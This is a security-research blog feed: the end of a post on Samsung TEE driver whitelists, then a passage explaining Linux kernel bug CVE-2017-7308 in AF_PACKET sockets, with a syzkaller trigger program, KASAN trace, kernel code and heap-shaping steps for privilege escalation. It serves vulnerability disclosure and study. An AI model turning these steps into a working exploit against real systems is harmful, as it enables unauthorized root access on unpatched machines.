Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver provides APIs to both read and write physical memory - a capability which is normally reserved for drivers alone.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever increasing number of trustlets result in a dangerous expansion of the TCB. This fact, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, make TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.

Categories: Security

Exploiting the Linux kernel via packet sockets

Google Project Zero - Wed, 05/10/2017 - 12:33
Guest blog post, posted by Andrey KonovalovIntroductionLately I’ve been spending some time fuzzing network-related Linux kernel interfaces with syzkaller. Besides the recently discovered vulnerability in DCCP sockets, I also found another one, this time in packet sockets. This post describes how the bug was discovered and how we can exploit it to escalate privileges.
The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled. As a result the following sanity check in the packet_set_ring() function in net/packet/af_packet.c can be bypassed, which later leads to an out-of-bounds access.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
The bug was introduced on Aug 19, 2011 in the commit f6fb8f10 ("af-packet: TPACKET_V3 flexible buffer implementation") together with the TPACKET_V3 implementation. There was an attempt to fix it on Aug 15, 2014 in commit dc808110 ("packet: handle too big packets for PACKET_V3") by adding additional checks, but this was not sufficient, as shown below. The bug was fixed in 2b6867c2 ("net/packet: fix overflow in check for priv area size") on Mar 29, 2017.
The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions. Exploitation requires the CAP_NET_RAW privilege to be able to create such sockets. However it's possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.
Since packet sockets are a quite widely used kernel feature, this vulnerability affects a number of popular Linux kernel distributions including Ubuntu and Android. It should be noted, that access to AF_PACKET sockets is expressly disallowed to any untrusted code within Android, although it is available to some privileged components. Updated Ubuntu kernels are already out, Android’s update is scheduled for July.Syzkaller
The bug was found with syzkaller, a coverage guided syscall fuzzer, and KASAN, a dynamic memory error detector. I’m going to provide some details on how syzkaller works and how to use it for fuzzing some kernel interface in case someone decides to try this.
Let’s start with a quick overview of how the syzkaller fuzzer works. Syzkaller is able to generate random programs (sequences of syscalls) based on manually written template descriptions for each syscall. The fuzzer executes these programs and collects code coverage for each of them. Using the coverage information, syzkaller keeps a corpus of programs, which trigger different code paths in the kernel. Whenever a new program triggers a new code path (i.e. gives new coverage), syzkaller adds it to the corpus. Besides generating completely new programs, syzkaller is able to mutate the existing ones from the corpus.
Syzkaller is meant to be used together with dynamic bug detectors like KASAN (detects memory bugs like out-of-bounds and use-after-frees, available upstream since 4.0), KMSAN (detects uses of uninitialized memory, prototype was just released) or KTSAN (detects data races, prototype is available). The idea is that syzkaller stresses the kernel and executes various interesting code paths and the detectors detect and report bugs.
The usual workflow for finding bugs with syzkaller is as follows:
  1. Setup syzkaller and make sure it works. README and wiki provides quite extensive information on how to do that.
  2. Write template descriptions for a particular kernel interface you want to test.
  3. Specify the syscalls that are used in this interface in the syzkaller config.
  4. Run syzkaller until it finds bugs. Usually this happens quite fast for the interfaces, that haven’t been tested with it previously.

Syzkaller uses it’s own declarative language to describe syscall templates. Checkout sys/sys.txt for an example or sys/ for the information on the syntax. Here’s an excerpt from the syzkaller descriptions for AF_PACKET sockets that I used to discover the bug:
resource sock_packet[sock]
define ETH_P_ALL_BE htons(ETH_P_ALL)
socket$packet(domain const[AF_PACKET], type flags[packet_socket_type], proto const[ETH_P_ALL_BE]) sock_packet
packet_socket_type = SOCK_RAW, SOCK_DGRAM
setsockopt$packet_rx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_RX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])setsockopt$packet_tx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_TX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])
tpacket_req { tp_block_size int32 tp_block_nr int32 tp_frame_size int32 tp_frame_nr int32}
tpacket_req3 { tp_block_size int32 tp_block_nr int32 tp_frame_size int32 tp_frame_nr int32 tp_retire_blk_tov int32 tp_sizeof_priv int32 tp_feature_req_word int32}
tpacket_req_u [ req tpacket_req req3 tpacket_req3] [varlen]
The syntax is mostly self-explanatory. First, we declare a new type sock_packet. This type is inherited from an existing type sock. That way syzkaller will use syscalls which have arguments of type sock on sock_packet sockets as well.
After that, we declare a new syscall socket$packet. The part before the $ sign tells syzkaller what syscall it should use, and the part after the $ sign is used to differentiate between different kinds of the same syscall. This is particularly useful when dealing with syscalls like ioctl. The socket$packet syscall returns a sock_packet socket.
Then setsockopt$packet_rx_ring and setsockopt$packet_tx_ring are declared. These syscalls set the PACKET_RX_RING and PACKET_TX_RING socket options on a sock_packet socket. I’ll talk about these options in details below. Both of them use the tpacket_req_u union as a socket option value. This union has two struct members tpacket_req and tpacket_req3.
Once the descriptions are added, syzkaller can be instructed to fuzz packet-related syscalls specifically. This is what I provided in the syzkaller manager config:
"enable_syscalls": [ "socket$packet", "socketpair$packet", "accept$packet", "accept4$packet", "bind$packet", "connect$packet", "sendto$packet", "recvfrom$packet", "getsockname$packet", "getpeername$packet", "listen", "setsockopt", "getsockopt", "syz_emit_ethernet" ],
After a few minutes of running syzkaller with these descriptions I started getting kernel crashes. Here’s one of the syzkaller programs that triggered the mentioned bug:
mmap(&(0x7f0000000000/0xc8f000)=nil, (0xc8f000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
r0 = socket$packet(0x11, 0x3, 0x300)
setsockopt$packet_int(r0, 0x107, 0xa, &(0x7f000061f000)=0x2, 0x4)
setsockopt$packet_rx_ring(r0, 0x107, 0x5, &(0x7f0000c8b000)=@req3={0x10000, 0x3, 0x10000, 0x3, 0x4, 0xfffffffffffffffe, 0x5}, 0x1c)
And here’s one of the KASAN reports. It should be noted, that since the access is quite far past the block bounds, allocation and deallocation stacks don’t correspond to the overflown object.
==================================================================BUG: KASAN: slab-out-of-bounds in prb_close_block net/packet/af_packet.c:808Write of size 4 at addr ffff880054b70010 by task syz-executor0/30839
CPU: 0 PID: 30839 Comm: syz-executor0 Not tainted 4.11.0-rc2+ #94Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011Call Trace: __dump_stack lib/dump_stack.c:16 [inline] dump_stack+0x292/0x398 lib/dump_stack.c:52 print_address_description+0x73/0x280 mm/kasan/report.c:246 kasan_report_error mm/kasan/report.c:345 [inline] kasan_report.part.3+0x21f/0x310 mm/kasan/report.c:368 kasan_report mm/kasan/report.c:393 [inline] __asan_report_store4_noabort+0x2c/0x30 mm/kasan/report.c:393 prb_close_block net/packet/af_packet.c:808 [inline] prb_retire_current_block+0x6ed/0x820 net/packet/af_packet.c:970 __packet_lookup_frame_in_block net/packet/af_packet.c:1093 [inline] packet_current_rx_frame net/packet/af_packet.c:1122 [inline] tpacket_rcv+0x9c1/0x3750 net/packet/af_packet.c:2236 packet_rcv_fanout+0x527/0x810 net/packet/af_packet.c:1493 deliver_skb net/core/dev.c:1834 [inline] __netif_receive_skb_core+0x1cff/0x3400 net/core/dev.c:4117 __netif_receive_skb+0x2a/0x170 net/core/dev.c:4244 netif_receive_skb_internal+0x1d6/0x430 net/core/dev.c:4272 netif_receive_skb+0xae/0x3b0 net/core/dev.c:4296 tun_rx_batched.isra.39+0x5e5/0x8c0 drivers/net/tun.c:1155 tun_get_user+0x100d/0x2e20 drivers/net/tun.c:1327 tun_chr_write_iter+0xd8/0x190 drivers/net/tun.c:1353 call_write_iter include/linux/fs.h:1733 [inline] new_sync_write fs/read_write.c:497 [inline] __vfs_write+0x483/0x760 fs/read_write.c:510 vfs_write+0x187/0x530 fs/read_write.c:558 SYSC_write fs/read_write.c:605 [inline] SyS_write+0xfb/0x230 fs/read_write.c:597 entry_SYSCALL_64_fastpath+0x1f/0xc2RIP: 0033:0x40b031RSP: 002b:00007faacbc3cb50 EFLAGS: 00000293 ORIG_RAX: 0000000000000001RAX: ffffffffffffffda RBX: 000000000000002a RCX: 000000000040b031RDX: 000000000000002a RSI: 0000000020002fd6 RDI: 0000000000000015RBP: 00000000006e2960 R08: 0000000000000000 R09: 0000000000000000R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000708000R13: 000000000000002a R14: 0000000020002fd6 R15: 0000000000000000
Allocated by task 30534: save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:513 set_track mm/kasan/kasan.c:525 [inline] kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617 kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:555 slab_post_alloc_hook mm/slab.h:456 [inline] slab_alloc_node mm/slub.c:2720 [inline] slab_alloc mm/slub.c:2728 [inline] kmem_cache_alloc+0x1af/0x250 mm/slub.c:2733 getname_flags+0xcb/0x580 fs/namei.c:137 getname+0x19/0x20 fs/namei.c:208 do_sys_open+0x2ff/0x720 fs/open.c:1045 SYSC_open fs/open.c:1069 [inline] SyS_open+0x2d/0x40 fs/open.c:1064 entry_SYSCALL_64_fastpath+0x1f/0xc2
Freed by task 30534: save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:513 set_track mm/kasan/kasan.c:525 [inline] kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590 slab_free_hook mm/slub.c:1358 [inline] slab_free_freelist_hook mm/slub.c:1381 [inline] slab_free mm/slub.c:2963 [inline] kmem_cache_free+0xb5/0x2d0 mm/slub.c:2985 putname+0xee/0x130 fs/namei.c:257 do_sys_open+0x336/0x720 fs/open.c:1060 SYSC_open fs/open.c:1069 [inline] SyS_open+0x2d/0x40 fs/open.c:1064 entry_SYSCALL_64_fastpath+0x1f/0xc2
Object at ffff880054b70040 belongs to cache names_cache of size 4096The buggy address belongs to the page:page:ffffea000152dc00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0flags: 0x500000000008100(slab|head)raw: 0500000000008100 0000000000000000 0000000000000000 0000000100070007raw: ffffea0001549a20 ffffea0001b3cc20 ffff88003eb44f40 0000000000000000page dumped because: kasan: bad access detected
Memory state around the buggy address: ffff880054b6ff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff880054b6ff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>ffff880054b70000: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb                         ^ ffff880054b70080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff880054b70100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb==================================================================
You can find more details about syzkaller in it’s repository and more details about KASAN in the kernel documentation. If you decide to try syzkaller or KASAN and run into any troubles drop an email to or to to AF_PACKET sockets
To better understand the bug, the vulnerability it leads to and how to exploit it, we need to understand what AF_PACKET sockets are and how they are implemented in the kernel.
AF_PACKET sockets allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers. To create an AF_PACKET socket a process must have the CAP_NET_RAW capability in the user namespace that governs its network namespace. More details can be found in the packet sockets documentation. It should be noted that if a kernel has unprivileged user namespaces enabled, then an unprivileged user is able to create packet sockets.
To send and receive packets on a packet socket, a process can use the send and recv syscalls. However, packet sockets provide a way to do this faster by using a ring buffer, that’s shared between the kernel and the userspace. A ring buffer can be created via the PACKET_TX_RING and PACKET_RX_RING socket options. The ring buffer can then be mmaped by the user and the packet data can then be read or written directly to it.
There are a few different variants of the way the ring buffer is handled by the kernel. This variant can be chosen by the user by using the PACKET_VERSION socket option. The difference between ring buffer versions can be found in the kernel documentation (search for “TPACKET versions”).
One of the widely known users of AF_PACKET sockets is the tcpdump utility. This is roughly what happens when tcpdump is used to sniff all packets on a particular interface:
# strace tcpdump -i eth0...socket(PF_PACKET, SOCK_RAW, 768)        = 3...bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0...setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0...setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0...mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000...
This sequence of syscalls corresponds to the following actions:
  1. A socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) is created.
  2. The socket is bound to the eth0 interface.
  3. Ring buffer version is set to TPACKET_V2 via the PACKET_VERSION socket option.
  4. A ring buffer is created via the PACKET_RX_RING socket option.
  5. The ring buffer is mmapped in the userspace.

After that the kernel will start putting all packets coming through the eth0 interface in the ring buffer and tcpdump will read them from the mmapped region in the userspace.

Ring buffers
Let’s see how to use ring buffers for packet sockets. For consistency all of the kernel code snippets below will come from the Linux kernel 4.8. This is the version the latest Ubuntu 16.04.2 kernel is based on.
The existing documentation mostly focuses on TPACKET_V1 and TPACKET_V2 ring buffer versions. Since the mentioned bug only affects the TPACKET_V3 version, I’m going to assume that we deal with that particular version for the rest of the post. Also I’m going to mostly focus on PACKET_RX_RING ignoring PACKET_TX_RING.
A ring buffer is a memory region used to store packets. Each packet is stored in a separate frame. Frames are grouped into blocks. In TPACKET_V3 ring buffers frame size is not fixed and can have arbitrary value as long as a frame fits into a block.
To create a TPACKET_V3 ring buffer via the PACKET_RX_RING socket option a user must provide the exact parameters for the ring buffer. These parameters are passed to the setsockopt call via a pointer to a request struct called tpacket_req3, which is defined as:
274 struct tpacket_req3 {275         unsigned int    tp_block_size;  /* Minimal size of contiguous block */276         unsigned int    tp_block_nr;    /* Number of blocks */277         unsigned int    tp_frame_size;  /* Size of frame */278         unsigned int    tp_frame_nr;    /* Total number of frames */279         unsigned int    tp_retire_blk_tov; /* timeout in msecs */280         unsigned int    tp_sizeof_priv; /* offset to private data area */281         unsigned int    tp_feature_req_word;282 };
Here’s what each field means in the tpacket_req3 struct:
  1. tp_block_size - the size of each block.
  2. tp_block_nr - the number of blocks.
  3. tp_frame_size - the size of each frame, ignored for TPACKET_V3.
  4. tp_frame_nr - the number of frames, ignored for TPACKET_V3.
  5. tp_retire_blk_tov - timeout after which a block is retired, even if it’s not fully filled with data (see below).
  6. tp_sizeof_priv - the size of per-block private area. This area can be used by a user to store arbitrary information associated with each block.
  7. tp_feature_req_word - a set of flags (actually just one at the moment), which allows to enable some additional functionality.

Each block has an associated header, which is stored at the very beginning of the memory area allocated for the block. The block header struct is called tpacket_block_desc and has a block_status field, which indicates whether the block is currently being used by the kernel or available to the user. The usual workflow is that the kernel stores packets into a block until it’s full and then sets block_status to TP_STATUS_USER. The user then reads required data from the block and releases it back to the kernel by setting block_status to TP_STATUS_KERNEL.
186 struct tpacket_hdr_v1 {187         __u32   block_status;188         __u32   num_pkts;189         __u32   offset_to_first_pkt;...233 };234 235 union tpacket_bd_header_u {236         struct tpacket_hdr_v1 bh1;237 };238 239 struct tpacket_block_desc {240         __u32 version;241         __u32 offset_to_priv;242         union tpacket_bd_header_u hdr;243 };
Each frame also has an associated header described by the struct tpacket3_hdr. The tp_next_offset field points to the next frame within the same block.
162 struct tpacket3_hdr {163         __u32 tp_next_offset;...176 };
When a block is fully filled with data (a new packet doesn’t fit into the remaining space), it’s closed and released to userspace or “retired” by the kernel. Since the user usually wants to see packets as soon as possible, the kernel can release a block even if it’s not filled with data completely. This is done by setting up a timer that retires current block with a timeout controlled by the tp_retire_blk_tov parameter.
There’s also a way so specify per-block private area, which the kernel won’t touch and the user can use to store any information associated with a block. The size of this area is passed via the tp_sizeof_priv parameter.
If you’d like to better understand how a userspace program can use TPACKET_V3 ring buffer you can read the example provided in the documentation (search for “TPACKET_V3 example“).

Implementation of AF_PACKET sockets
Let’s take a quick look at how some of this is implemented in the kernel.
Struct definitions
Whenever a packet socket is created, an associated packet_sock struct is allocated in the kernel:
103 struct packet_sock {...105         struct sock             sk;...108         struct packet_ring_buffer       rx_ring;109         struct packet_ring_buffer       tx_ring;...123         enum tpacket_versions   tp_version;...130         int                     (*xmit)(struct sk_buff *skb);...132 };
The tp_version field in this struct holds the ring buffer version, which in our case is set to TPACKET_V3 by a PACKET_VERSION setsockopt call. The rx_ring and tx_ring fields describe the receive and transmit ring buffers in case they are created via PACKET_RX_RING and PACKET_TX_RING setsockopt calls. These two fields have type packet_ring_buffer, which is defined as:
56 struct packet_ring_buffer {57         struct pgv              *pg_vec;...70         struct tpacket_kbdq_core        prb_bdqc;71 };
The pg_vec field is a pointer to an array of pgv structs, each of which holds a reference to a block. Blocks are actually allocated separately, not as a one contiguous memory region.
52 struct pgv {53         char *buffer;54 };

The prb_bdqc field is of type tpacket_kbdq_core and its fields describe the current state of the ring buffer:
14 struct tpacket_kbdq_core {...21         unsigned short  blk_sizeof_priv;...36         char            *nxt_offset;...49         struct timer_list retire_blk_timer;50 };
The blk_sizeof_priv fields contains the size of the per-block private area. The nxt_offset field points inside the currently active block and shows where the next packet should be saved. The retire_blk_timer field has type timer_list and describes the timer which retires current block on timeout.
12 struct timer_list {...17         struct hlist_node       entry;18         unsigned long           expires;19         void                    (*function)(unsigned long);20         unsigned long           data;...31 };
Ring buffer setup
The kernel uses the packet_setsockopt() function to handle setting socket options for packet sockets. When the PACKET_VERSION socket option is used, the kernel sets po->tp_version to the provided value.
With the PACKET_RX_RING socket option a receive ring buffer is created. Internally it’s done by the packet_set_ring() function. This function does a lot of things, so I’ll just show the important parts. First, packet_set_ring() performs a bunch of sanity checks on the provided ring buffer parameters:
4202                 err = -EINVAL;4203                 if (unlikely((int)req->tp_block_size <= 0))4204                         goto out;4205                 if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))4206                         goto out;4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;4211                 if (unlikely(req->tp_frame_size < po->tp_hdrlen +4212                                         po->tp_reserve))4213                         goto out;4214                 if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))4215                         goto out;4216 4217                 rb->frames_per_block = req->tp_block_size / req->tp_frame_size;4218                 if (unlikely(rb->frames_per_block == 0))4219                         goto out;4220                 if (unlikely((rb->frames_per_block * req->tp_block_nr) !=4221                                         req->tp_frame_nr))4222                         goto out;
Then, it allocates the ring buffer blocks:
4224                 err = -ENOMEM;4225                 order = get_order(req->tp_block_size);4226                 pg_vec = alloc_pg_vec(req, order);4227                 if (unlikely(!pg_vec))4228                         goto out;
It should be noted that alloc_pg_vec() uses the kernel page allocator to allocate blocks (we’ll use this in the exploit):
4104 static char *alloc_one_pg_vec_page(unsigned long order)4105 {...4110         buffer = (char *) __get_free_pages(gfp_flags, order);4111         if (buffer)4112                 return buffer;...4127 }4128 4129 static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)4130 {...4139         for (i = 0; i < block_nr; i++) {4140                 pg_vec[i].buffer = alloc_one_pg_vec_page(order);...4143         }...4152 }
Finally, packet_set_ring() calls init_prb_bdqc(), which performs some additional steps to set up a TPACKET_V3 receive ring buffer specifically:
4229                 switch (po->tp_version) {4230                 case TPACKET_V3:...4234                         if (!tx_ring)4235                                 init_prb_bdqc(po, rb, pg_vec, req_u);4236                         break;4237                 default:4238                         break;4239                 }
The init_prb_bdqc() function copies provided ring buffer parameters to the prb_bdqc field of the ring buffer struct, calculates some other parameters based on them, sets up the block retire timer and calls prb_open_block() to initialize the first block:
604 static void init_prb_bdqc(struct packet_sock *po,605                         struct packet_ring_buffer *rb,606                         struct pgv *pg_vec,607                         union tpacket_req_u *req_u)608 {609         struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);610         struct tpacket_block_desc *pbd;...616         pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;617         p1->pkblk_start = pg_vec[0].buffer;618         p1->kblk_size = req_u->req3.tp_block_size;...630         p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;631 632         p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);633         prb_init_ft_ops(p1, req_u);634         prb_setup_retire_blk_timer(po);635         prb_open_block(p1, pbd);636 }
On of the things that the prb_open_block() function does is it sets the nxt_offset field of the tpacket_kbdq_core struct to point right after the per-block private area:
841 static void prb_open_block(struct tpacket_kbdq_core *pkc1,842         struct tpacket_block_desc *pbd1)843 {...862         pkc1->pkblk_start = (char *)pbd1;863         pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);...876 }
Packet reception
Whenever a new packet is received, the kernel is supposed to save it into the ring buffer. The key function here is __packet_lookup_frame_in_block(), which does the following:
  1. Checks whether the currently active block has enough space for the packet.
  2. If yes, saves the packet to the current block and returns.
  3. If no, dispatches the next block and saves the packet there.

1041 static void *__packet_lookup_frame_in_block(struct packet_sock *po,1042                                             struct sk_buff *skb,1043                                                 int status,1044                                             unsigned int len1045                                             )1046 {1047         struct tpacket_kbdq_core *pkc;1048         struct tpacket_block_desc *pbd;1049         char *curr, *end;1050 1051         pkc = GET_PBDQC_FROM_RB(&po->rx_ring);1052         pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);...1075         curr = pkc->nxt_offset;1076         pkc->skb = skb;1077         end = (char *)pbd + pkc->kblk_size;1078 1079         /* first try the current block */1080         if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {1081                 prb_fill_curr_block(curr, pkc, pbd, len);1082                 return (void *)curr;1083         }1084 1085         /* Ok, close the current block */1086         prb_retire_current_block(pkc, po, 0);1087 1088         /* Now, try to dispatch the next block */1089         curr = (char *)prb_dispatch_next_block(pkc, po);1090         if (curr) {1091                 pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);1092                 prb_fill_curr_block(curr, pkc, pbd, len);1093                 return (void *)curr;1094         }...1101 }Vulnerability
Let’s look closely at the following check from packet_set_ring():
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
This is supposed to ensure that the length of the block header together with the per-block private data is not bigger than the size of the block. Which totally makes sense, otherwise we won’t have enough space in the block for them let alone the packet data.
However turns out this check can be bypassed. In case req_u->req3.tp_sizeof_priv has the higher bit set, casting the expression to int results in a big positive value instead of negative. To illustrate this behavior:
A = req->tp_block_size = 4096 = 0x1000B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0(int)0x7fffffd0 = 0x7fffffd0 > 0
Later, when req_u->req3.tp_sizeof_priv is copied to p1->blk_sizeof_priv in init_prb_bdqc() (see the snippet above), it’s clamped to two lower bytes, since the type of the latter is unsigned short. So this bug basically allows us to set the blk_sizeof_priv of the tpacket_kbdq_core struct to arbitrary value bypassing all sanity checks.
If we search through the net/packet/af_packet.c source looking for blk_sizeof_priv usage, we’ll find that it’s being used in the two following places.
The first one is in init_prb_bdqc() right after it gets assigned (see the code snippet above) to set max_frame_len. The value of p1->max_frame_len denotes the maximum size of a frame that can be saved into a block. Since we control p1->blk_sizeof_priv, we can make BLK_PLUS_PRIV(p1->blk_sizeof_priv) bigger than p1->kblk_size. This will result in p1->max_frame_len having a huge value, higher than the size of a block. This allows us to bypass the size check when a frame is being copied into a block, thus causing a kernel heap out-of-bounds write.
That’s not all. Another user of blk_sizeof_priv is prb_open_block(), which initializes a block (the code snippet is above as well). There pkc1->nxt_offset denotes the address, where the kernel will write a new packet when it’s being received. The kernel doesn’t intend to overwrite the block header and per-block private data, so it makes this address to point right after them. Since we control blk_sizeof_priv, we can control the lowest two bytes of nxt_offset. This allows us to control offset of the out-of-bounds write.
To sum up, this bug leads to a kernel heap out-of-bounds write of controlled maximum size and controlled offset up to about 64k bytes. Exploitation
Let’s see how we can exploit this vulnerability. I’m going to be targeting x86-64 Ubuntu 16.04.2 with 4.8.0-41-generic kernel version with KASLR, SMEP and SMAP enabled. Ubuntu kernel has user namespaces available to unprivileged users (CONFIG_USER_NS=y and no restrictions on it’s usage), so the bug can be exploited to gain root privileges by an unprivileged user. All of the exploitation steps below are performed from within a user namespace.
The Linux kernel has support for a few hardening features that make exploitation more difficult. KASLR (Kernel Address Space Layout Randomization) puts the kernel text at a random offset to make jumping to a particular fixed address useless. SMEP (Supervisor Mode Execution Protection) causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP (Supervisor Mode Access Prevention) does the same whenever the kernel tries to access the userspace memory directly.
Shaping heap
The idea of the exploit is to use the heap out-of-bounds write to overwrite a function pointer in the memory adjacent to the overflown block. For that we need to specifically shape the heap, so some object with a triggerable function pointer is placed right after a ring buffer block. I chose the already mentioned packet_sock struct to be this object. We need to find a way to make the kernel allocate a ring buffer block and a packet_sock struct one next to the other.
As I mentioned above, ring buffer blocks are allocated with the kernel page allocator (buddy allocator). It allows to allocate blocks of 2^n contiguous memory pages. The allocator keeps a freelist of such block for each n and returns the freelist head when a block is requested. If the freelist for some n is empty, it finds the first m > n, for which the freelist is not empty and splits it in halves until the required size is reached. Therefore, if we start repeatedly allocating blocks of size 2^n, at some point they will start coming from one high order memory block being split and they will be adjacent each one to the next.
A packet_sock is allocated via the kmalloc() function by the slab allocator. The slab allocator is mostly used to allocate objects of a smaller-than-one-page size. It uses the page allocator to allocate a big block of memory and splits this block into smaller objects. The big blocks are called slabs, hence the name of the allocator. A set of slabs together with their current state and a set of operations like “allocate an object” and “free an object” is called a cache. The slab allocator creates a set of general purpose caches for objects of size 2^n. Whenever kmalloc(size) is called, the slab allocator rounds size up to the nearest power of 2 and uses the cache of that size.
Since the kernel uses kmalloc() all the time, if we try to allocate an object it will most likely come from one of the slabs already created during previous usage. However, if we start allocating objects of the same size, at some point the slab allocator will run out of slabs for this size and will have to allocate another one via the page allocator.
The size of a newly allocated slab depends on the size of objects this slab is meant for. The size of the packet_sock struct is ~1920 and 1024 < 1920 <= 2048, which means that it’ll be rounded to 2048 and the kmalloc-2048 cache will be used. Turns out, for this particular cache the SLUB allocator (which is the kind of slab allocator used in Ubuntu) uses slabs of size 0x8000. So whenever the allocator runs out of slabs for the kmalloc-2048 cache, it allocates 0x8000 bytes with the page allocator.
Keeping all that in mind, this is how we can allocate a kmalloc-2048 slab next to a ring buffer block:
  1. Allocate a lot (512 worked for me) of objects of size 2048 to fill currently existing slabs in the kmalloc-2048 cache. To do that we can create a bunch of packet sockets to cause allocation of packet_sock structs.
  2. Allocate a lot (1024 worked for me) page blocks of size 0x8000 to drain the page allocator freelists and cause some high-order page block to be split. To do that we can create another packet socket and attach a ring buffer with 1024 blocks of size 0x8000.
  3. Create a packet socket and attach a ring buffer with blocks of size 0x8000. The last one of these blocks (I’m using 2 blocks, the reason is explained below) is the one we’re going to overflow.
  4. Create a bunch of packet sockets to allocate packet_sock structs and cause an allocation of at least one new slab.
This way we can shape the heap in the following way:

The exact number of allocations to drain freelists and shape the heap the way we want might be different for different setups and depend on the memory usage activity. The numbers above are for a mostly idle Ubuntu machine.
Controlling the overwrite
Above I explained that the bug results in a write of a controlled maximum size at a controlled offset out of the bounds of a ring buffer block. Turns out not only we can control the maximum size and offset, we can actually control the exact data (and it’s size) that’s being written. Since the data that’s being stored in a ring buffer block is the packet that’s passing through a particular network interface, we can manually send packets with arbitrary content on a raw socket through the loopback interface. If we’re doing that in an isolated network namespace no external traffic will interfere.
There are a few caveats though.
First, it seems that the size of a packet must be at least 14 bytes (12 bytes for two mac addresses and 2 bytes for the EtherType apparently) for it to be passed to the packet socket layer. That means that we have to overwrite at least 14 bytes. The data in the packet itself can be arbitrary.
